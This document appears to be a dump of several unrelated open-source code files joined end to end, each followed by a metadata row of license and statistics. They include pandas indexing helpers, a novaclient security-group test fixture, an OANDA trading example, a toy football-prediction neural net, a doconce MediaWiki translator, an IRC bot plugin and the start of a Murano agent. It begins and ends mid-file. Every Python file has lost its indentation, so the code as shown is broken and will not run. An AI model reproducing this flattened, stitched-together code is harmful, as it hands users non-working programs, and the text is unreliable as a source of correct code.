elements (specified by `n`), or was still negative.
"""
if isinstance(indices, list):
indices = np.array(indices)
if len(indices) == 0:
# If `indices` is empty, np.array will return a float,
# and will cause indexing errors.
return np.empty(0, dtype=np.intp)
mask = indices < 0
if mask.any():
indices = indices.copy()
indices[mask] += n
mask = (indices >= n) | (indices < 0)
if mask.any():
raise IndexError("indices are out-of-bounds")
return indices
# -----------------------------------------------------------
# Unsorted
def length_of_indexer(indexer, target=None) -> int:
"""
Return the expected length of target[indexer]
Returns
-------
int
"""
if target is not None and isinstance(indexer, slice):
target_len = len(target)
start = indexer.start
stop = indexer.stop
step = indexer.step
if start is None:
start = 0
elif start < 0:
start += target_len
if stop is None or stop > target_len:
stop = target_len
elif stop < 0:
stop += target_len
if step is None:
step = 1
elif step < 0:
start, stop = stop + 1, start + 1
step = -step
return (stop - start + step - 1) // step
elif isinstance(indexer, (ABCSeries, ABCIndexClass, np.ndarray, list)):
if isinstance(indexer, list):
indexer = np.array(indexer)
if indexer.dtype == bool:
# GH#25774
return indexer.sum()
return len(indexer)
elif not is_list_like_indexer(indexer):
return 1
raise AssertionError("cannot find the length of the indexer")
def deprecate_ndim_indexing(result, stacklevel=3):
"""
Helper function to raise the deprecation warning for multi-dimensional
indexing on 1D Series/Index.
GH#27125 indexer like idx[:, None] expands dim, but we cannot do that
and keep an index, so we currently return ndarray, which is deprecated
(Deprecation GH#30588).
"""
if np.ndim(result) > 1:
warnings.warn(
"Support for multi-dimensional indexing (e.g. `obj[:, None]`) "
"is deprecated and will be removed in a future "
"version. Convert to a numpy array before indexing instead.",
FutureWarning,
stacklevel=stacklevel,
)
def unpack_1tuple(tup):
"""
If we have a length-1 tuple/list that contains a slice, unpack to just
the slice.
Notes
-----
The list case is deprecated.
"""
if len(tup) == 1 and isinstance(tup[0], slice):
# if we don't have a MultiIndex, we may still be able to handle
# a 1-tuple. see test_1tuple_without_multiindex
if isinstance(tup, list):
# GH#31299
warnings.warn(
"Indexing with a single-item list containing a "
"slice is deprecated and will raise in a future "
"version. Pass a tuple instead.",
FutureWarning,
stacklevel=3,
)
return tup[0]
return tup
# -----------------------------------------------------------
# Public indexer validation
def check_array_indexer(array: AnyArrayLike, indexer: Any) -> Any:
"""
Check if `indexer` is a valid array indexer for `array`.
For a boolean mask, `array` and `indexer` are checked to have the same
length. The dtype is validated, and if it is an integer or boolean
ExtensionArray, it is checked if there are missing values present, and
it is converted to the appropriate numpy array. Other dtypes will raise
an error.
Non-array indexers (integer, slice, Ellipsis, tuples, ..) are passed
through as is.
.. versionadded:: 1.0.0
Parameters
----------
array : array-like
The array that is being indexed (only used for the length).
indexer : array-like or list-like
The array-like that's used to index. List-like input that is not yet
a numpy array or an ExtensionArray is converted to one. Other input
types are passed through as is.
Returns
-------
numpy.ndarray
The validated indexer as a numpy array that can be used to index.
Raises
------
IndexError
When the lengths don't match.
ValueError
When `indexer` cannot be converted to a numpy ndarray to index
(e.g. presence of missing values).
See Also
--------
api.types.is_bool_dtype : Check if `key` is of boolean dtype.
Examples
--------
When checking a boolean mask, a boolean ndarray is returned when the
arguments are all valid.
>>> mask = pd.array([True, False])
>>> arr = pd.array([1, 2])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
An IndexError is raised when the lengths don't match.
>>> mask = pd.array([True, False, True])
>>> pd.api.indexers.check_array_indexer(arr, mask)
Traceback (most recent call last):
...
IndexError: Boolean index has wrong length: 3 instead of 2.
NA values in a boolean array are treated as False.
>>> mask = pd.array([True, pd.NA])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
A numpy boolean mask will get passed through (if the length is correct):
>>> mask = np.array([True, False])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
Similarly for integer indexers, an integer ndarray is returned when it is
a valid indexer, otherwise an error is (for integer indexers, a matching
length is not required):
>>> indexer = pd.array([0, 2], dtype="Int64")
>>> arr = pd.array([1, 2, 3])
>>> pd.api.indexers.check_array_indexer(arr, indexer)
array([0, 2])
>>> indexer = pd.array([0, pd.NA], dtype="Int64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
ValueError: Cannot index with an integer indexer containing NA values
For non-integer/boolean dtypes, an appropriate error is raised:
>>> indexer = np.array([0., 2.], dtype="float64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
IndexError: arrays used as indices must be of integer or boolean type
"""
from pandas.core.construction import array as pd_array
# whatever is not an array-like is returned as-is (possible valid array
# indexers that are not array-like: integer, slice, Ellipsis, None)
# In this context, tuples are not considered as array-like, as they have
# a specific meaning in indexing (multi-dimensional indexing)
if is_list_like(indexer):
if isinstance(indexer, tuple):
return indexer
else:
return indexer
# convert list-likes to array
if not is_array_like(indexer):
indexer = pd_array(indexer)
if len(indexer) == 0:
# empty list is converted to float array by pd.array
indexer = np.array([], dtype=np.intp)
dtype = indexer.dtype
if is_bool_dtype(dtype):
if is_extension_array_dtype(dtype):
indexer = indexer.to_numpy(dtype=bool, na_value=False)
else:
indexer = np.asarray(indexer, dtype=bool)
# GH26658
if len(indexer) != len(array):
raise IndexError(
f"Boolean index has wrong length: "
f"{len(indexer)} instead of {len(array)}"
)
elif is_integer_dtype(dtype):
try:
indexer = np.asarray(indexer, dtype=np.intp)
except ValueError as err:
raise ValueError(
"Cannot index with an integer indexer containing NA values"
) from err
else:
raise IndexError("arrays used as indices must be of integer or boolean type")
return indexer
|
bsd-3-clause
| 7,059,395,294,665,719,000 | 27.556452 | 88 | 0.578791 | false | 4.2509 | false | false | false |
Shihta/python-novaclient
|
novaclient/tests/fixture_data/security_groups.py
|
1
|
3693
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from novaclient.openstack.common import jsonutils
from novaclient.tests import fakes
from novaclient.tests.fixture_data import base
class Fixture(base.Fixture):
base_url = 'os-security-groups'
def setUp(self):
super(Fixture, self).setUp()
security_group_1 = {
"name": "test",
"description": "FAKE_SECURITY_GROUP",
"tenant_id": "4ffc664c198e435e9853f2538fbcd7a7",
"id": 1,
"rules": [
{
"id": 11,
"group": {},
"ip_protocol": "TCP",
"from_port": 22,
"to_port": 22,
"parent_group_id": 1,
"ip_range": {"cidr": "10.0.0.0/8"}
},
{
"id": 12,
"group": {
"tenant_id": "272bee4c1e624cd4a72a6b0ea55b4582",
"name": "test2"
},
"ip_protocol": "TCP",
"from_port": 222,
"to_port": 222,
"parent_group_id": 1,
"ip_range": {}
}
]
}
security_group_2 = {
"name": "test2",
"description": "FAKE_SECURITY_GROUP2",
"tenant_id": "272bee4c1e624cd4a72a6b0ea55b4582",
"id": 2,
"rules": []
}
get_groups = {'security_groups': [security_group_1, security_group_2]}
headers = {'Content-Type': 'application/json'}
self.requests.register_uri('GET', self.url(),
json=get_groups,
headers=headers)
get_group_1 = {'security_group': security_group_1}
self.requests.register_uri('GET', self.url(1),
json=get_group_1,
headers=headers)
self.requests.register_uri('DELETE', self.url(1), status_code=202)
def post_os_security_groups(request, context):
body = jsonutils.loads(request.body)
assert list(body) == ['security_group']
fakes.assert_has_keys(body['security_group'],
required=['name', 'description'])
return {'security_group': security_group_1}
self.requests.register_uri('POST', self.url(),
json=post_os_security_groups,
headers=headers,
status_code=202)
def put_os_security_groups_1(request, context):
body = jsonutils.loads(request.body)
assert list(body) == ['security_group']
fakes.assert_has_keys(body['security_group'],
required=['name', 'description'])
return body
self.requests.register_uri('PUT', self.url(1),
json=put_os_security_groups_1,
headers=headers,
status_code=205)
|
apache-2.0
| 2,774,355,458,957,496,300 | 36.30303 | 78 | 0.486325 | false | 4.324356 | false | false | false |
PurpleHominid/The-Warlock-of-Firetop-Mountain
|
WOFT_01.py
|
1
|
1632
|
class clsLocation:
#this class provides the support for enumerated locations
ROOM=0
DOOR=1
WALL=2
#some more changes went here before the start of the service
#
#
#this branch is called development 01
#this is another branch here
class clsPlayerState:
#this class provides the functions to support the player state
#define class based variables; common to all instances
__playerCount=0 #create a common variable; use '__' to hide the variable
def __init__(self, startState):
#this function is automatically executed when a new class instance is created
clsPlayerState.__playerCount+=1 #increase the hidden player count
#define instance variables, specific to single instance
self.location=startState #initialise the stating location
def fnUpdate(self):
#this function updates the players state
if self.location==clsLocation.ROOM: #at the room
self.fnROOM() #create options for room
elif self.location==clsLocation.DOOR: #at the door
self.fnDOOR() #create options for door
elif self.location==clsLocation.WALL: #at the wall
self.fnWALL() #create options for wall
def fnROOM(self):
#describe the location
print("You are at the room")
def fnDOOR(self):
#describe the location
print("You are at the door")
def fnWALL(self):
#describe the location
print("You are at the wall")
#begin the main code
insPlayer=clsPlayerState(clsLocation.ROOM) #initialise the player instance using the class
insPlayer.fnUpdate()
|
mit
| 5,276,123,399,268,443,000 | 27.137931 | 90 | 0.681985 | false | 4.25 | false | false | false |
hootnot/oandapyV20-examples
|
src/contrib_mo_tp_sl.py
|
1
|
1328
|
# -*- coding: utf-8 -*-
"""Example demonstrating the contrib.request classes.
Create a MarketOrderRequest to enter 10000 EUR_USD LONG position along with
- a TakeProfitOrder to take profit @1.10
- a StopLossOrder to take loss @1.07
These values apply for this moment: EUR_USD 1.0605
So when you run the example you may need to change the values.
"""
import json
from oandapyV20.contrib.requests import (
MarketOrderRequest,
TakeProfitDetails,
StopLossDetails
)
import oandapyV20.endpoints.orders as orders
import oandapyV20
from exampleauth import exampleAuth
accountID, access_token = exampleAuth()
api = oandapyV20.API(access_token=access_token)
# EUR_USD (today 1.0605)
EUR_USD_STOP_LOSS = 1.05
EUR_USD_TAKE_PROFIT = 1.10
# The orderspecs
mktOrder = MarketOrderRequest(
instrument="EUR_USD",
units=10000,
takeProfitOnFill=TakeProfitDetails(price=EUR_USD_TAKE_PROFIT).data,
stopLossOnFill=StopLossDetails(price=EUR_USD_STOP_LOSS).data
)
print("Market Order specs: \n{}".format(json.dumps(mktOrder.data, indent=4)))
# create the OrderCreate request
r = orders.OrderCreate(accountID, data=mktOrder.data)
try:
# create the OrderCreate request
rv = api.request(r)
except oandapyV20.exceptions.V20Error as err:
print(r.status_code, err)
else:
print(json.dumps(rv, indent=2))
|
mit
| -5,632,243,889,746,396,000 | 25.039216 | 77 | 0.750753 | false | 2.951111 | false | false | false |
thommiller/ANN---Pymier-League
|
Main.py
|
1
|
1763
|
import numpy as np
# sigmoid function
def nonlin(x,deriv=False):
if(deriv==True):
return x*(1-x)
return 1/(1+np.exp(-x))
def displayPred(num):
if(num> 0.5 and num <0.75):
return " - Draw"
elif(num>0.75):
return " - Win"
else:
return " - Loss"
# for training data we will compare Man-Utd's last 10 games
# input data will be [homeTeam, awayTeam]
# output data will be [0 | loss, 0.5 | draw, 1 | win]
# input dataset - every football match from 2014-2015 (MASSIVE WEB SCRAPING TASK)
#man u = 0, stoke = 1, yeovil town = 2, QPR = 3, cambridge = 4, leicester = 5
teams = ["Man U", "Stoke", "Yeovil Town", "QPR", "Cambridge", "Leicester"]
X = np.array([ [1,0], #stoke vs man u - draw
[0,2], #yeovil town vs man u - won
[3,0],
[4,0],
[0,5]
])
# output dataset
y = np.array([[0.5,1,1,0.5,1]]).T
# seed random numbers to make calculation
# deterministic (just a good practice)
np.random.seed(1)
# initialize weights randomly with mean 0
syn0 = 3*np.random.random((2,1)) - 1
for iter in xrange(10000):
# forward propagation
l0 = X
l1 = nonlin(np.dot(l0,syn0))
# how much did we miss?
l1_error = y - l1
# multiply how much we missed by the
# slope of the sigmoid at the values in l1
l1_delta = l1_error * nonlin(l1,True)
# update weights
syn0 += np.dot(l0.T, l1_delta)
print "Game predictions based on training data:"
print teams[1],"\t\tvs\t",teams[0], displayPred(l1[0])
print teams[0],"\t\tvs\t",teams[2], displayPred(l1[1])
print teams[3],"\t\tvs\t",teams[0], displayPred(l1[2])
print teams[4],"\tvs\t",teams[0], displayPred(l1[3])
print teams[0],"\t\tvs\t",teams[5], displayPred(l1[4])
|
mit
| 3,757,302,599,893,747,700 | 27.435484 | 81 | 0.600681 | false | 2.716487 | false | false | false |
Outernet-Project/librarian
|
librarian/tasks/notifications.py
|
1
|
1481
|
import datetime
import logging
from greentasks import Task
from ..core.exts import ext_container as exts
from ..core.utils import utcnow
class NotificationCleanupTask(Task):
name = 'notifications'
periodic = True
def get_start_delay(self):
return exts.config['notifications.default_expiry']
def get_delay(self, previous_delay):
return exts.config['notifications.default_expiry']
def run(self):
db = exts.databases.librarian
default_expiry = exts.config['notifications.default_expiry']
logging.debug("Notification cleanup started.")
now = utcnow()
auto_expires_at = now - datetime.timedelta(seconds=default_expiry)
where = '''notifications.dismissable = true AND (
(notifications.expires_at IS NULL AND
notifications.created_at <= %(auto_expires_at)s) OR
notifications.expires_at <= %(now)s)'''
query = db.Delete('notifications', where=where)
target_query = db.Delete('notification_targets USING notifications',
where=where)
target_query.where += ('notification_targets.notification_id = '
'notifications.notification_id')
params = dict(now=now, auto_expires_at=auto_expires_at)
db.execute(target_query, params)
rows = db.execute(query, params)
logging.debug("{} expired notifications deleted.".format(rows))
|
gpl-3.0
| -2,417,505,482,011,534,000 | 37.973684 | 76 | 0.633356 | false | 4.434132 | false | false | false |
wolf9s/doconce
|
lib/doconce/mwiki.py
|
1
|
17031
|
"""
MediaWiki translator, aimed at Wikipedia/WikiBooks type of web pages.
Syntax defined by http://en.wikipedia.org/wiki/Help:Wiki_markup
and http://en.wikipedia.org/wiki/Help:Displaying_a_formula.
The prefix m in the name mwiki distinguishes this translator from
gwiki (googlecode wiki).
Not yet implemented:
mwiki_ref_and_label (just using code from gwiki)
Just using plan ASCII solutions for index_bib (requires some work to
port to MediaWiki, but is straightforward - use rst as template) and
exercise (probably ok with the plain solution).
GitHub wiki pages understand MediaWiki, see
https://github.com/github/gollum
The page http://en.wikibooks.org/wiki/Wikibooks:Sandbox is fine for
short-lived experiments.
http://shoutwiki.com can host MediaWiki pages.
http://jumpwiki.com/wiki/Main_Page can also host MediaWiki pages, but
there are troubles with align envirs and math (ugly typesetting and
some strange indents).
Create a user account, choose *Create a Wiki* in the menu on the left,
fill out the form, wait until you get a Main Page, click on edit, make
references to a new page, say [[First demo|demo]], save, click on
demo and fill out that page with the content of a mydoconcefile.wiki,
sometimes it is necessary to create a new account, just do that and
go back.
"""
import re, os, commands, sys
from common import default_movie, plain_exercise, insert_code_and_tex
from plaintext import plain_quiz
from misc import _abort
def align2equations(math_text):
"""
Transform an align environment to a set of equation environments.
Used to handle multiple equations if align does not work well.
Note: This version is outdated. common.align2equations is the
newest attempt to implement align in terms of single equations.
"""
if not '{align' in math_text:
return
math_text = math_text.replace('&', '')
math_text = math_text.replace('\\\\', r"""
</math>
:<math>""")
pattern = r'\\(begin|end)\{align\*?\}\s*'
math_text = re.sub(pattern, '', math_text)
# :<math> and </math> surroundings appear when !bt and !et are translated
return math_text
def equation2nothing(math_text):
pattern = r'\\(begin|end)\{equation\*?\}\s*'
math_text = re.sub(pattern, '', math_text)
math_text = math_text.replace(r'\[', '')
math_text = math_text.replace(r'\]', '')
return math_text
def remove_labels(math_text):
pattern = 'label\{(.+?)\}\s*'
labels = re.findall(pattern, math_text)
if labels:
math_text = re.sub(pattern, '', math_text)
return math_text, labels
def mwiki_code(filestr, code_blocks, code_block_types,
tex_blocks, format):
# http://en.wikipedia.org/wiki/Help:Displaying_a_formula
# MediaWiki math does not support labels in equations.
# The enviros equation and \[ \] must be removed (not supported).
for i in range(len(tex_blocks)):
# Standard align works in Wikipedia and Wikibooks.
# Standard align gives somewhat ugly output on wiiki.com services,
# but a set of separate equations is not much better.
# We therefore stick to align instead.
#tex_blocks[i] = align2equations(tex_blocks[i])
tex_blocks[i] = equation2nothing(tex_blocks[i])
tex_blocks[i], labels = remove_labels(tex_blocks[i])
for label in labels:
if label in filestr:
print '*** warning: reference to label "%s" in an equation does not work in MediaWiki' % label
filestr = insert_code_and_tex(filestr, code_blocks, tex_blocks, format)
# Supported programming languages:
# http://www.mediawiki.org/wiki/Extension:SyntaxHighlight_GeSHi#Supported_languages
envir2lang = dict(cod='python', pycod='python', cycod='python',
fcod='fortran', ccod='c', cppcod='cpp',
mcod='matlab', plcod='perl', shcod='bash',
pro='python', pypro='python', cypro='python',
fpro='fortran', cpro='c', cpppro='cpp',
mpro='matlab', plpro='perl', shpro='bash',
rbpro='ruby', rbcod='ruby',
javacod='java', javapro='java',
htmlcod='html5', xmlcod='xml',
htmlpro='html5', xmlpro='xml',
html='html5', xml='xml',
sys='bash', dat='text', csv='text', txt='text',
pyoptpro='python', pyscpro='python',
ipy='python', pyshell='python',
)
for key in envir2lang:
language = envir2lang[key]
cpattern = re.compile(r'^!bc\s+%s\s*\n' % key, flags=re.MULTILINE)
filestr = cpattern.sub('<syntaxhighlight lang="%s">\n' % \
envir2lang[key], filestr)
c = re.compile(r'^!bc.*$\n', re.MULTILINE)
filestr = c.sub('<syntaxhighlight lang="text">\n', filestr)
filestr = re.sub(r'!ec\n', '</syntaxhighlight>\n', filestr)
c = re.compile(r'^!bt\n', re.MULTILINE)
filestr = c.sub(':<math>\n', filestr)
filestr = re.sub(r'!et\n', '</math>\n', filestr)
# Final fix of MediaWiki file
# __TOC__ syntax is misinterpretated as paragraph heading, so we
# use <<<TOC>>> instead and replace to right syntax here at the end.
filestr = filestr.replace('<<<TOC>>>', '__TOC__')
return filestr
def mwiki_figure(m):
filename = m.group('filename')
link = filename if filename.startswith('http') else None
if not link and not os.path.isfile(filename):
raise IOError('no figure file %s' % filename)
basename = os.path.basename(filename)
stem, ext = os.path.splitext(basename)
root, ext = os.path.splitext(filename)
if link is None:
if not ext in '.png .gif .jpg .jpeg'.split():
# try to convert image file to PNG, using
# convert from ImageMagick:
cmd = 'convert %s png:%s' % (filename, root+'.png')
failure, output = commands.getstatusoutput(cmd)
if failure:
print '\n**** warning: could not run ', cmd
print ' convert %s to PNG format manually' % filename
_abort()
filename = root + '.png'
caption = m.group('caption').strip()
if caption != '':
caption = '|' + caption # add | for non-empty caption
else:
# Avoid filename as caption when caption is empty
# see http://www.mediawiki.org/wiki/Help:Images
caption = '|<span title=""></span>'
# keep label if it's there:
caption = re.sub(r'label\{(.+?)\}', '(\g<1>)', caption)
size = ''
opts = m.group('options').strip()
if opts:
info = dict([s.split('=') for s in opts.split()])
if 'width' in info and 'height' in info:
size = '|%sx%spx' % (info['width'], info['height'])
elif 'width' in info:
size = '|%spx' % info['width']
elif 'height' in info:
size = '|x%spx' % info['height']
if link:
# We link to some image on the web
filename = os.path.basename(filename)
link = os.path.dirname(link)
result = r"""
[[File:%s|frame%s|link=%s|alt=%s%s]]
""" % (filename, size, link, filename, caption)
else:
# We try to link to a file at wikimedia.org.
found_wikimedia = False
orig_filename = filename
# Check if the file exists and find the appropriate wikimedia name.
# http://en.wikipedia.org/w/api.php?action=query&titles=Image:filename&prop=imageinfo&format=xml
# Skip directories - get the basename
filename = os.path.basename(filename)
import urllib
prms = urllib.urlencode({
'action': 'query', 'titles': 'Image:' + filename,
'prop': 'imageinfo', 'format': 'xml'})
url = 'http://en.wikipedia.org/w/api.php?' + prms
try:
print ' ...checking if %s is stored at en.wikipedia.org/w/api.php...' % filename
f = urllib.urlopen(url)
imageinfo = f.read()
f.close()
def get_data(name, text):
pattern = '%s="(.*?)"' % name
m = re.search(pattern, text)
if m:
match = m.group(1)
if 'Image:' in match:
return match.split('Image:')[1]
if 'File:' in match:
return match.split('File:')[1]
else:
return match
else:
return None
data = ['from', 'to', 'title', 'missing', 'imagerepository',
'timestamp', 'user']
orig_filename = filename
filename = get_data('title', imageinfo)
user = get_data('user', imageinfo)
timestamp = get_data('timestamp', imageinfo)
if user:
found_wikimedia = True
print ' ...found %s at wikimedia' % filename
result = r"""
[[File:%s|frame%s|alt=%s%s]] <!-- user: %s, filename: %s, timestamp: %s -->
""" % (filename, size, filename, caption, user, orig_filename, timestamp)
except IOError:
print ' ...no Internet connection...'
if not found_wikimedia:
print ' ...for wikipedia/wikibooks you must upload image file %s to\n common.wikimedia.org' % orig_filename
# see http://commons.wikimedia.org/wiki/Commons:Upload
# and http://commons.wikimedia.org/wiki/Special:UploadWizard
print ' ...for now we use local file %s' % filename
# This is fine if we use github wiki
result = r"""
[[File:%s|frame%s|alt=%s%s]] <!-- not yet uploaded to common.wikimedia.org -->
""" % (filename, size, filename, caption)
return result
from common import table_analysis
def mwiki_author(authors_and_institutions, auth2index,
inst2index, index2inst, auth2email):
authors = []
for author, i, email in authors_and_institutions:
if email is None:
email_text = ''
else:
name, adr = email.split('@')
email_text = ' (%s at %s)' % (name, adr)
authors.append('_%s_%s' % (author, email_text))
if len(authors) == 1:
authors = authors[0]
elif len(authors) == 2:
authors = authors[0] + ' and ' + authors[1]
elif len(authors) > 2:
authors[-1] = 'and ' + authors[-1]
authors = ', '.join(authors)
else:
# no authors:
return ''
text = '\n\nBy ' + authors + '\n\n'
# we skip institutions in mwiki
return text
from gwiki import wiki_ref_and_label_common
def mwiki_ref_and_label(section_label2title, format, filestr):
return wiki_ref_and_label_common(section_label2title, format, filestr)
def mwiki_admon(block, format, title='Warning', text_size='normal',
admon_type='warning'):
if title.lower().strip() == 'none':
title = ''
# Blocks without explicit title should have empty title
if title == 'Block':
title = ''
if title and title[-1] not in ('.', ':', '!', '?'):
# Make sure the title ends with puncuation
title += '.'
admon_type2mwiki = dict(notice='notice',
warning='warning', # or critical or important
hint='notice',
quote='quote')
if admon_type in admon_type2mwiki:
admon_type = admon_type2mwiki[admon_type] # use mwiki admon
else:
admon_type = title # Just use the title
text = "'''%s''' " % title + block
if text_size == 'normal':
text_size = '90%'
elif text_size == 'large':
text_size = '130%'
elif text_size == 'small':
text_size = '80%'
if admon_type == 'quote':
s = """
{{quote box
| quote = %s
| textstyle = font-size: %s;
}}
""" % (block, text_size)
# quote has also | source = ... but other formats like
# latex and html have no specific source tag, so it must
# be typeset manually
else:
s = """
{{mbox
| type = %s
| textstyle = font-size: %s;
| text = %s
}}
""" % (admon_type, text_size, text)
return s
# mbox: notice
def define(FILENAME_EXTENSION,
BLANKLINE,
INLINE_TAGS_SUBST,
CODE,
LIST,
ARGLIST,
TABLE,
EXERCISE,
FIGURE_EXT,
CROSS_REFS,
INDEX_BIB,
TOC,
ENVIRS,
QUIZ,
INTRO,
OUTRO,
filestr):
# all arguments are dicts and accept in-place modifications (extensions)
FILENAME_EXTENSION['mwiki'] = '.mwiki' # output file extension
BLANKLINE['mwiki'] = '\n'
# replacement patterns for substitutions of inline tags
INLINE_TAGS_SUBST['mwiki'] = {
'math': r'\g<begin><math>\g<subst></math>\g<end>',
'math2': r'\g<begin><math>\g<latexmath></math>\g<end>',
'emphasize': r"\g<begin>''\g<subst>''\g<end>",
'bold': r"\g<begin>'''\g<subst>'''\g<end>",
'verbatim': r'\g<begin><code>\g<subst></code>\g<end>',
#'linkURL': r'\g<begin>[\g<url> \g<link>]\g<end>',
'linkURL2': r'[\g<url> \g<link>]',
'linkURL3': r'[\g<url> \g<link>]',
'linkURL2v': r'[\g<url> <code>\g<link></code>]',
'linkURL3v': r'[\g<url> <code>\g<link></code>]',
'plainURL': r'\g<url>',
'colortext': r'<font color="\g<color>">\g<text></font>',
'chapter': r"""== '''\g<subst>''' ==""",
'section': r'== \g<subst> ==',
'subsection': r'=== \g<subst> ===',
'subsubsection': r'==== \g<subst> ====\n',
'paragraph': r"''\g<subst>''\n",
'title': r'#TITLE (actually governed by the filename): \g<subst>\n',
'date': r'===== \g<subst> =====',
'author': mwiki_author, #r'===== \g<name>, \g<institution> =====',
# 'figure': r'<\g<filename>>',
'figure': mwiki_figure,
'movie': default_movie, # will not work for HTML movie player
'comment': '<!-- %s -->',
'abstract': r'\n*\g<type>.* \g<text>\g<rest>',
'linebreak': r'\g<text><br />',
'non-breaking-space': ' ',
'horizontal-rule': '----',
'ampersand2': r' \g<1>&\g<2>',
}
CODE['mwiki'] = mwiki_code
from html import html_table
TABLE['mwiki'] = html_table
ENVIRS['mwiki'] = {
'warning': lambda block, format, title='Warning', text_size='normal':
mwiki_admon(block, format, title, text_size, 'warning'),
'notice': lambda block, format, title='Notice', text_size='normal':
mwiki_admon(block, format, title, text_size, 'notice'),
'question': lambda block, format, title='Question', text_size='normal':
mwiki_admon(block, format, title, text_size, 'question'),
'hint': lambda block, format, title='Hint', text_size='normal':
mwiki_admon(block, format, title, text_size, 'hint'),
'summary': lambda block, format, title='Summary', text_size='normal':
mwiki_admon(block, format, title, text_size, 'summary'),
'block': lambda block, format, title='Block', text_size='normal':
mwiki_admon(block, format, title, text_size, 'block'),
'box': lambda block, format, title='none', text_size='normal':
mwiki_admon(block, format, title, text_size, 'box'),
'quote': lambda block, format, title='none', text_size='normal':
mwiki_admon(block, format, title, text_size, 'quote'),
}
# native list:
LIST['mwiki'] = {
'itemize': {'begin': '\n', 'item': '*', 'end': '\n\n'},
'enumerate': {'begin': '\n', 'item': '#', 'end': '\n\n'},
'description': {'begin': '\n', 'item': '* %s ', 'end': '\n\n'},
'separator': '\n'}
# Try this:
LIST['mwiki'] = LIST['html']
# how to typeset description lists for function arguments, return
# values, and module/class variables:
ARGLIST['mwiki'] = {
'parameter': '*argument*',
'keyword': '*keyword argument*',
'return': '*return value(s)*',
'instance variable': '*instance variable*',
'class variable': '*class variable*',
'module variable': '*module variable*',
}
FIGURE_EXT['mwiki'] = {
'search': ('.png', '.gif', '.jpg', '.jpeg'),
'convert': ('.png', '.gif', '.jpg')}
CROSS_REFS['mwiki'] = mwiki_ref_and_label
from plaintext import plain_index_bib
EXERCISE['mwiki'] = plain_exercise
INDEX_BIB['mwiki'] = plain_index_bib
TOC['mwiki'] = lambda s: '<<<TOC>>>' # __TOC__ will be wrongly translated to paragraph headline and needs a fix
QUIZ['mwiki'] = plain_quiz
# document start:
INTRO['mwiki'] = ''
|
bsd-3-clause
| 7,633,075,306,408,647,000 | 37.531674 | 122 | 0.557278 | false | 3.591523 | false | false | false |
andyeff/skybot
|
plugins/giantbomb.py
|
1
|
1360
|
from urllib2 import HTTPError
from util import hook, http
@hook.command(autohelp=False)
def gb(inp):
'.gb - lists upcoming shows on Giant Bomb'
url = 'http://www.giantbomb.com'
try:
doc = http.get_html(url)
except HTTPError as e:
errors = {400: 'bad request (ratelimited?) 400',
401: 'unauthorized 401 ',
403: 'forbidden 403',
404: 'invalid user/id 404',
500: 'something is broken 500',
502: 'something is down ("getting upgraded?") 502',
503: 'something is overloaded 503',
410: 'something something 410'}
if e.code == 404:
return 'bad url?'
if e.code in errors:
return 'error: ' + errors[e.code]
return 'error: unknown %s' % e.code
if not doc.find_class("promo-upcoming"):
return "no results found!"
upcoming = doc.find_class("promo-upcoming")[0]
uptitles = upcoming.xpath('.//h4[@class="title"]')
uptimes = upcoming.xpath('.//p[@class="time"]')
list_titles = [x.text_content() for x in uptitles]
list_times = [x.text_content() for x in uptimes]
shows = zip(list_titles, list_times)
res = " | ".join(' - '.join(i) for i in shows)
if len(res) > 420:
res = res[0:420] + " ..."
return res
|
unlicense
| 7,194,837,047,324,547,000 | 29.909091 | 69 | 0.548529 | false | 3.578947 | false | false | false |
cc-archive/commoner
|
src/commoner/broadcast/context_processors.py
|
1
|
1043
|
from django.conf import settings
from django.contrib.auth.decorators import login_required
from commoner.broadcast.models import Message, Log
def messages(request):
if request.user.is_authenticated():
messages = Message.active.all()
site_messages = []
for message in messages:
try:
# it exists in the log
log = Log.objects.get(user=request.user, message=message)
# the user hasn't acked
if message.ack_req and not log.acked:
# show the alert
site_messages.append(message)
except:
site_messages.append(message)
Log(
user = request.user,
message = message,
acked = False
).save()
return {'site_messages' : site_messages}
else:
return {}
|
agpl-3.0
| 3,577,103,782,968,181,000 | 28 | 73 | 0.466922 | false | 5.518519 | false | false | false |
telefonicaid/murano-agent
|
muranoagent/app.py
|
1
|
8000
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import time
import types
import bunch
import semver
from muranoagent.common import config
from muranoagent.common import messaging
from muranoagent import exceptions as exc
from muranoagent import execution_plan_queue
from muranoagent import execution_plan_runner
from muranoagent import execution_result as ex_result
from muranoagent.openstack.common import log as logging
from muranoagent.openstack.common import service
CONF = config.CONF
LOG = logging.getLogger(__name__)
format_version = '2.0.0'
class MuranoAgent(service.Service):
def __init__(self):
self._queue = execution_plan_queue.ExecutionPlanQueue()
super(MuranoAgent, self).__init__()
@staticmethod
def _load_package(name):
try:
LOG.debug('Loading plugin %s', name)
__import__(name)
except Exception:
LOG.warn('Cannot load package %s', name, exc_info=True)
pass
def _load(self):
path = os.path.join(os.path.dirname(__file__), 'executors')
sys.path.insert(1, path)
for entry in os.listdir(path):
package_path = os.path.join(path, entry)
if os.path.isdir(package_path):
MuranoAgent._load_package(entry)
def start(self):
self._load()
msg_iterator = self._wait_plan()
while True:
try:
self._loop_func(msg_iterator)
except Exception as ex:
LOG.exception(ex)
time.sleep(5)
def _loop_func(self, msg_iterator):
result, timestamp = self._queue.get_execution_plan_result()
if result is not None:
if self._send_result(result):
self._queue.remove(timestamp)
return
plan = self._queue.get_execution_plan()
if plan is not None:
